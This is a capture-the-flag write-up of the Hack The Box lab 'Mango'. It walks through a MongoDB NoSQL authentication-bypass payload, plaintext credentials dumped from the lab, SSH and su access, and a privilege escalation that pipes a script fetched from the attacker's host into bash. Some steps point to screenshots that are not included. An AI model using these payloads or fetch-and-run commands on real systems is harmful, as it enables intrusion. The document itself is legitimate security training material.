HTB Mango Writeup

Mango is a good linux based machine to improve your enumeration skills you might learn some new things from this.

Enumeration

nmap -sC -sV 10.10.10.162

Opening the host in our browser on port 80 we are presented with an 403 forbidden error so we tried opening the host on 443 and got this.

Now this looks like a search engine let’s check the source code
after looking at the source code we couldn’t find anything there
let’s check the nmap report again

| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN

Adding this to our /etc/hosts
$ echo "10.10.10.162 staging-order.mango.htb" >> /etc/hosts

We can browse http://staging-order.mango.htb/
Here we can see a login panel like this

After trying random credentials we got nothing.
Here mango could be a wordplay on mongoDB
mongoDB is a NoSQL database to exploit it we need to search mongoDB NoSQL.
To confirm this we went to this github repo and tried authentication bypass.

Basic authentication bypass using not equal ($ne) or greater ($gt)

username[$ne]=admin&password[$ne]=admin

In response we got HTTP/1.1 302 Found


After searching about it we came across a github repository which can enumerate Usernames and passwords of NoSQL (MongoDB) injecion vulnerable web applications.

After running the script we have now 2 credentials
admin:t9KcS3>!0B#2
mango:h3mXK8RhU~f{]f5H

We can connect the user mango from SSH with the password we get earlier.

#ssh mango@10.10.10.162
mango@10.10.10.162's password:
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
Documentation: https://help.ubuntu.com
Management: https://landscape.canonical.com
Support: https://ubuntu.com/advantage
System information as of Fri Apr 17 05:33:13 UTC 2020
System load: 0.12 Processes: 117
Usage of /: 25.9% of 19.56GB Users logged in: 1
Memory usage: 16% IP address for ens33: 10.10.10.162
Swap usage: 4%
Canonical Livepatch is available for installation.
Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
122 packages can be updated.
18 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Apr 17 05:14:54 2020 from 10.10.15.51

we got the shell
Nothing is here on this user we can’t find any user flag checking the home folder to find the flag in other user we couldn’t get into it.
But we have an admin password let’s try to switch mango to admin with the password we got previously.
su admin
it worked

mango@mango:~$ su admin
Password:
$ whoami
admin
$ cat /home/admin/user.txt
79bf3[redacted]47e92

Now main part is to get root flag
To get an idea for privilege escalation we can run LinEnum here.
curl 10.10.15.51:80/LinEnum.sh | bash
reading the output of LinEnum we saw this line

We searched about this on google and saw this
We can print root.txt from this

We got the root flag but still we don’t have root shell but we can write our SSH public key to authorized_keys to get ssh access as root.

Alternate

You can print root.txt or can get root shell by using -scripting flag.

To get shell you can use same method.

Here we got out root shell.

Hope you like it.

Leave a Reply